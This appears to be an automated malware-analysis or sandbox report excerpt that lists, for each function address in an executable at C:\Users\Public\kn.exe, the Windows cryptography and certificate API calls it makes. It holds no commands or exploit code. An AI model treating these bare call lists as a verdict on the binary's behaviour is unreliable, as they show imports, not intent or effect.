Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA287A70 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,NCryptSecretAgreement,#205,#357,#357,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,NCryptDeriveKey,#205,#359,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF6AA287A70
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA299A58 #357,#357,#210,#357,SetWindowTextW,SetFocus,SendMessageW,SendMessageW,LocalAlloc,#357,#357,LocalFree,UpdateWindow,CoInitialize,LoadCursorW,SetCursor,LoadCursorW,SetCursor,SetFocus,SetWindowTextW,SetFocus,#357,SetFocus,SendMessageW,#357,LocalFree,LocalFree,LocalFree,CryptUIDlgFreeCAContext,CoUninitialize,7_2_00007FF6AA299A58
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA29BA50 CryptSignCertificate,SetLastError,7_2_00007FF6AA29BA50
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA281A44 CryptContextAddRef,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,7_2_00007FF6AA281A44
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA213A40 LocalFree,LocalFree,strcmp,#357,strcmp,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,CryptDecodeObject,strcmp,LocalFree,strcmp,GetLastError,#357,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,#357,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,strcmp,strcmp,strcmp,#357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,LocalFree,strcmp,LocalFree,GetLastError,strcmp,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF6AA213A40
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2E5AA8 CryptDecodeObjectEx,7_2_00007FF6AA2E5AA8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2AFA84 LocalAlloc,#357,memmove,CryptDecrypt,GetLastError,#357,LocalFree,7_2_00007FF6AA2AFA84
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA243B14 NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,CryptDestroyKey,7_2_00007FF6AA243B14
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA279AF8 CertCloseStore,CertCloseStore,CryptMsgClose,LocalFree,LocalFree,NCryptFreeObject,7_2_00007FF6AA279AF8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA21FF64 NCryptGetProperty,#359,NCryptGetProperty,CertEnumCertificatesInStore,CertFindCertificateInStore,CertFreeCertificateContext,CertEnumCertificatesInStore,CertFreeCertificateContext,CertCloseStore,CertCloseStore,#357,7_2_00007FF6AA21FF64
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA255F54 GetLastError,LocalAlloc,memmove,wcschr,CryptFindOIDInfo,#357,#357,LocalFree,LocalFree,7_2_00007FF6AA255F54
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA285FA8 NCryptIsKeyHandle,wcscmp,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,7_2_00007FF6AA285FA8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA289F90 memmove,wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,7_2_00007FF6AA289F90
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA215FE8 #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,7_2_00007FF6AA215FE8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2E5FF0 CryptDecodeObjectEx,CryptDecodeObjectEx,7_2_00007FF6AA2E5FF0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA254070 _wcsnicmp,_wcsnicmp,_wcsnicmp,#357,GetLastError,#359,#357,LocalAlloc,memmove,wcsstr,#223,#357,#359,LocalFree,#359,LocalFree,LocalFree,LocalFree,LocalFree,CryptMemFree,7_2_00007FF6AA254070
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2AE044 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,LocalAlloc,#359,LocalFree,7_2_00007FF6AA2AE044
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2160DA #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,7_2_00007FF6AA2160DA
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2E5D74 CryptDecodeObjectEx,strcmp,strcmp,7_2_00007FF6AA2E5D74
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA239D6C #357,#357,#359,LocalAlloc,#357,#357,wcsrchr,LocalAlloc,memmove,CryptFindLocalizedName,wcsrchr,CryptFindLocalizedName,#357,GetLastError,#359,CertOpenStore,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF6AA239D6C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA241D70 #357,LocalAlloc,memmove,#357,CryptSetKeyParam,GetLastError,LocalAlloc,memmove,CryptDecrypt,GetLastError,#357,#357,#358,LocalFree,LocalFree,#357,#357,#357,LocalFree,LocalFree,LocalFree,7_2_00007FF6AA241D70
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA263D60 #359,GetLastError,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,CryptReleaseContext,7_2_00007FF6AA263D60
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B7D3C #357,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,wcschr,CryptFindOIDInfo,#359,LocalFree,7_2_00007FF6AA2B7D3C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2BBD3C NCryptIsKeyHandle,#357,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,LocalFree,7_2_00007FF6AA2BBD3C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA215DA1 #358,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,7_2_00007FF6AA215DA1
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA295D80 #357,NCryptIsKeyHandle,GetSecurityDescriptorLength,CryptSetProvParam,GetLastError,LocalFree,#357,7_2_00007FF6AA295D80
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA23DD80 CertFindExtension,CryptDecodeObject,7_2_00007FF6AA23DD80
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1F1DE8 GetSystemDefaultLangID,wcscspn,LocalFree,LocalFree,CryptEnumOIDInfo,qsort,free,7_2_00007FF6AA1F1DE8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA271E2C CryptAcquireContextW,GetLastError,#357,CryptGenKey,GetLastError,CryptDestroyKey,#357,GetLastError,#357,#357,LocalAlloc,#357,memmove,LocalFree,memset,CryptGenRandom,GetLastError,#357,GetSystemTime,SystemTimeToFileTime,GetLastError,CertCreateCertificateContext,GetLastError,CryptReleaseContext,LocalFree,LocalFree,LocalFree,7_2_00007FF6AA271E2C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA215DF7 GetLastError,#357,#357,#358,#358,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCRLsInStore,CertEnumCRLsInStore,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,#357,7_2_00007FF6AA215DF7
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2ADE70 NCryptIsKeyHandle,#357,CryptExportKey,GetLastError,#358,LocalAlloc,#357,CryptExportKey,GetLastError,LocalFree,7_2_00007FF6AA2ADE70
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2E5E3C CryptDecodeObjectEx,strcmp,strcmp,strcmp,7_2_00007FF6AA2E5E3C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA26DEB0 wcscspn,#357,GetFileAttributesW,GetLastError,#359,CertEnumCertificatesInStore,CertGetCRLContextProperty,CryptBinaryToStringW,wcsstr,CertEnumCertificatesInStore,GetLastError,GetLastError,LocalFree,LocalFree,CertCloseStore,CertFreeCertificateContext,7_2_00007FF6AA26DEB0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA23DEA4 memset,GetSystemTimeAsFileTime,CryptGenRandom,GetLastError,LocalAlloc,GetLastError,#357,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,7_2_00007FF6AA23DEA4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B7EE8 CryptFindOIDInfo,#357,CryptInitOIDFunctionSet,CryptGetOIDFunctionAddress,GetLastError,GetLastError,GetLastError,#357,strcmp,GetLastError,strcmp,GetLastError,CryptFindOIDInfo,CryptFindOIDInfo,#357,LocalFree,LocalFree,CryptFreeOIDFunctionAddress,LocalFree,LocalFree,7_2_00007FF6AA2B7EE8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2E5F20 CryptDecodeObjectEx,7_2_00007FF6AA2E5F20
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA237F14 CryptAcquireCertificatePrivateKey,GetLastError,#357,CryptSetProvParam,GetLastError,GetSecurityDescriptorLength,#359,CryptReleaseContext,7_2_00007FF6AA237F14
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA275F04 #357,#357,SysAllocStringByteLen,#357,SysFreeString,#357,#359,#357,lstrcmpW,CryptMsgControl,GetLastError,#357,CertFreeCertificateContext,#359,CertFreeCTLContext,LocalFree,SysFreeString,LocalFree,7_2_00007FF6AA275F04
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA20B36C GetLastError,CryptHashCertificate,GetLastError,CryptHashCertificate2,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#357,#357,#357,LocalFree,SysFreeString,7_2_00007FF6AA20B36C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA23B350 CryptFindLocalizedName,CertEnumPhysicalStore,GetLastError,#357,7_2_00007FF6AA23B350
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA245338 wcsrchr,#357,#357,LocalAlloc,memmove,wcsrchr,GetLastError,#360,#357,#357,LocalFree,LocalFree,LocalFree,CryptReleaseContext,7_2_00007FF6AA245338
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA217340 GetModuleHandleW,GetProcAddress,GetLastError,BCryptExportKey,#360,LocalAlloc,CryptHashCertificate2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalFree,7_2_00007FF6AA217340
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2933B0 CertFindExtension,#357,CryptDecodeObject,GetLastError,#357,#357,7_2_00007FF6AA2933B0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B93A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,7_2_00007FF6AA2B93A0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B739C CryptAcquireContextW,GetLastError,#360,#360,SetLastError,7_2_00007FF6AA2B739C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2633A0 CryptVerifyCertificateSignature,CertCompareCertificateName,7_2_00007FF6AA2633A0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA283390 CryptGetUserKey,#205,GetLastError,#357,#357,SetLastError,7_2_00007FF6AA283390
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2653E8 CryptEncodeObjectEx,GetLastError,#357,7_2_00007FF6AA2653E8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2413F0 CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptHashData,CryptHashData,GetLastError,CryptImportPublicKeyInfo,CryptVerifySignatureW,CertCreateCertificateContext,#357,LocalFree,GetLastError,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,7_2_00007FF6AA2413F0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA26B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,7_2_00007FF6AA26B3D8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA28342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF6AA28342C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B141C GetLastError,CryptDecodeObjectEx,GetLastError,#357,LocalFree,7_2_00007FF6AA2B141C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA29B464 CryptEncodeObjectEx,SetLastError,7_2_00007FF6AA29B464
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1E5438 memset,#246,#357,#357,GetLastError,#357,CertFindExtension,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,7_2_00007FF6AA1E5438
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2AF4A0 CryptHashPublicKeyInfo,SetLastError,7_2_00007FF6AA2AF4A0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA26F488 #357,LocalAlloc,memmove,CryptDuplicateKey,GetLastError,CryptDecrypt,GetLastError,CryptDestroyKey,LocalFree,7_2_00007FF6AA26F488
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA289480 memmove,BCryptDecrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,memmove,BCryptEncrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF6AA289480
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B14F0 GetEnvironmentVariableW,#205,#205,#203,CryptDestroyHash,CryptReleaseContext,CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptReleaseContext,GetLastError,#357,#357,#203,#357,#357,#357,#357,#203,LocalFree,#203,#357,#357,#207,#203,#203,LocalFree,#203,#203,CryptDestroyHash,CryptReleaseContext,7_2_00007FF6AA2B14F0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA29B4EC CryptDecodeObjectEx,SetLastError,7_2_00007FF6AA29B4EC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2834F8 CryptImportPublicKeyInfo,#205,GetLastError,#357,#357,SetLastError,7_2_00007FF6AA2834F8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA243504 CreateFileW,GetLastError,#357,GetFileSize,GetLastError,#357,SetFilePointer,GetLastError,#357,CertFreeCertificateContext,CertFreeCertificateContext,CryptDestroyKey,CryptReleaseContext,CloseHandle,7_2_00007FF6AA243504
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA26F168 CryptDuplicateKey,GetLastError,#357,CryptEncrypt,GetLastError,CryptEncrypt,GetLastError,CryptDestroyKey,7_2_00007FF6AA26F168
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA265164 GetLastError,#357,CryptEncodeObjectEx,GetLastError,#357,LocalFree,7_2_00007FF6AA265164
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2551A4 #360,#357,#359,#207,CryptFindOIDInfo,#357,GetLastError,#357,#207,#360,#254,#358,LocalFree,LocalFree,LocalFree,7_2_00007FF6AA2551A4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA263188 CryptAcquireContextW,GetLastError,#359,#359,CryptAcquireContextW,GetLastError,7_2_00007FF6AA263188
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B7178 BCryptCloseAlgorithmProvider,#360,7_2_00007FF6AA2B7178
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2811C8 NCryptVerifySignature,#205,#357,#357,#357,#357,7_2_00007FF6AA2811C8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B71C8 BCryptDestroyKey,#360,7_2_00007FF6AA2B71C8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2831C0 CryptGetKeyParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,7_2_00007FF6AA2831C0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B7214 NCryptIsKeyHandle,#357,CryptReleaseContext,GetLastError,7_2_00007FF6AA2B7214
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2D9208 #357,NCryptEnumKeys,#360,#358,7_2_00007FF6AA2D9208
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA21D240 #357,CryptFindOIDInfo,#357,LocalFree,7_2_00007FF6AA21D240
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2832A8 CryptGetProvParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,7_2_00007FF6AA2832A8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA24B2B4 #357,CryptHashCertificate,GetLastError,#357,memcmp,#358,7_2_00007FF6AA24B2B4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B7290 NCryptIsKeyHandle,#359,#360,#357,#358,7_2_00007FF6AA2B7290
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2AD28C CryptFindOIDInfo,CryptEnumOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,#358,7_2_00007FF6AA2AD28C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA27F2F0 BCryptCreateHash,#205,#357,#357,#357,#357,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF6AA27F2F0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2592D8 CertEnumCertificatesInStore,CertGetCRLContextProperty,CertSetCTLContextProperty,GetLastError,#357,#357,CertEnumCertificatesInStore,CryptMsgControl,GetLastError,#357,CryptMsgGetAndVerifySigner,GetLastError,#357,CryptMsgGetAndVerifySigner,#357,CertFreeCertificateContext,CertGetCRLContextProperty,CertEnumCertificatesInStore,#357,#357,#207,LocalFree,#357,#357,CertFreeCertificateContext,CompareFileTime,CertFreeCertificateContext,7_2_00007FF6AA2592D8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2632D0 #359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,7_2_00007FF6AA2632D0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2492C4 memset,CryptHashCertificate,GetLastError,CryptHashCertificate,GetLastError,GetLastError,GetLastError,#357,#254,LocalAlloc,wcsstr,LocalAlloc,LocalAlloc,#357,memmove,GetLastError,GetProcAddress,GetLastError,GetLastError,#359,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FreeLibrary,7_2_00007FF6AA2492C4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA21B324 CryptDecodeObject,GetLastError,#357,#357,LocalFree,7_2_00007FF6AA21B324
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA26D30C BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,7_2_00007FF6AA26D30C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA21D304 #357,CryptFindOIDInfo,#359,LocalAlloc,CryptEncodeObjectEx,GetLastError,LocalFree,LocalFree,LocalFree,7_2_00007FF6AA21D304
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA285768 NCryptIsKeyHandle,??_V@YAXPEAX@Z,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF6AA285768
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA24F774 CertFindExtension,#357,CryptVerifyCertificateSignature,GetLastError,GetLastError,memmove,LocalFree,7_2_00007FF6AA24F774
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2AD750 LocalAlloc,CryptFormatObject,GetLastError,#358,#358,LocalFree,#357,7_2_00007FF6AA2AD750
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2837A4 CryptSetKeyParam,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF6AA2837A4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA29B794 CryptExportPublicKeyInfoEx,SetLastError,7_2_00007FF6AA29B794
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA21D790 SslEnumProtocolProviders,#357,SslOpenProvider,SslFreeBuffer,SslFreeObject,SslFreeBuffer,#359,LocalAlloc,BCryptGetProperty,CryptFindOIDInfo,BCryptDestroyKey,BCryptDestroyKey,LocalFree,7_2_00007FF6AA21D790
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA25577C #360,#358,CryptDecodeObject,GetLastError,#357,7_2_00007FF6AA25577C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1FB788 #140,iswdigit,CryptDecodeObject,GetLastError,#357,#357,#224,7_2_00007FF6AA1FB788
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2997E4 LoadCursorW,SetCursor,#210,LoadCursorW,SetCursor,#357,EnableWindow,SetWindowLongPtrW,SetWindowLongPtrW,SetWindowLongPtrW,GetDlgItem,SetWindowTextW,GetDlgItem,ShowWindow,CryptUIDlgFreeCAContext,LocalFree,7_2_00007FF6AA2997E4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2217D4 #357,#359,#357,NCryptFinalizeKey,#360,#359,#359,#357,NCryptDeleteKey,#360,#359,#359,#359,LocalFree,LocalFree,7_2_00007FF6AA2217D4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA26B808 I_CryptFindLruEntry,I_CryptGetLruEntryData,#357,I_CryptReleaseLruEntry,7_2_00007FF6AA26B808
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA21F810 #223,CryptDecodeObjectEx,GetLastError,CertFindAttribute,CertFindAttribute,GetLastError,#357,LocalFree,LocalFree,7_2_00007FF6AA21F810
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2AF7FC CryptExportKey,GetLastError,#357,LocalAlloc,CryptExportKey,GetLastError,LocalFree,7_2_00007FF6AA2AF7FC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA283860 CryptSetProvParam,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF6AA283860
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA27184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,7_2_00007FF6AA27184C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA26D850 #357,Sleep,BCryptCloseAlgorithmProvider,I_CryptFreeLruCache,7_2_00007FF6AA26D850
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B98B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,7_2_00007FF6AA2B98B0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA259878 strcmp,strcmp,strcmp,#357,#357,CompareFileTime,LocalFree,CryptMsgClose,CertCloseStore,CompareFileTime,#357,#357,7_2_00007FF6AA259878
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA217884 GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,7_2_00007FF6AA217884
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2518DC CertFindExtension,CryptDecodeObject,GetLastError,#357,7_2_00007FF6AA2518DC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA26B8D0 I_CryptGetLruEntryData,#357,7_2_00007FF6AA26B8D0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA203918 #357,#357,#357,#357,CertFindExtension,CryptDecodeObject,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF6AA203918
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA28391C CryptVerifySignatureW,#205,GetLastError,#357,#359,#357,SetLastError,7_2_00007FF6AA28391C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2AF918 CryptEncrypt,GetLastError,LocalFree,LocalAlloc,#357,LocalFree,7_2_00007FF6AA2AF918
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1F38FC RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,7_2_00007FF6AA1F38FC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2AF570 CryptHashCertificate,SetLastError,7_2_00007FF6AA2AF570
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA24B55C CertFreeCertificateContext,CertCreateCertificateContext,GetLastError,CertDuplicateCertificateContext,#357,#358,CertCompareCertificateName,CryptVerifyCertificateSignatureEx,GetLastError,#357,#357,CertFreeCertificateContext,CertVerifyTimeValidity,#357,7_2_00007FF6AA24B55C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA283590 CryptImportPublicKeyInfoEx2,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF6AA283590
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B9580 memset,#357,CryptCreateHash,GetLastError,#357,CryptGenRandom,GetLastError,CryptHashData,GetLastError,CryptSignHashW,GetLastError,LocalAlloc,CryptSignHashW,GetLastError,CryptImportPublicKeyInfo,GetLastError,CryptVerifySignatureW,GetLastError,#357,CryptDestroyHash,CryptDestroyKey,LocalFree,CryptReleaseContext,7_2_00007FF6AA2B9580
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2455F0 #357,#360,GetLastError,#360,#359,NCryptDeleteKey,#360,#357,LocalFree,LocalFree,7_2_00007FF6AA2455F0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA20D5C2 CertCloseStore,CryptMsgClose,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF6AA20D5C2
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA20F630 CryptAcquireContextW,GetLastError,#357,SetLastError,7_2_00007FF6AA20F630
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2695FC BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,CertGetCRLContextProperty,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,BCryptCloseAlgorithmProvider,7_2_00007FF6AA2695FC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1F5664 #256,#357,CryptHashCertificate2,GetLastError,#254,#254,#357,#207,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,#359,7_2_00007FF6AA1F5664
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA25366C CryptVerifyCertificateSignature,GetLastError,CryptVerifyCertificateSignatureEx,GetLastError,#357,7_2_00007FF6AA25366C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA26B664 I_CryptFindLruEntry,I_CryptGetLruEntryData,I_CryptReleaseLruEntry,7_2_00007FF6AA26B664
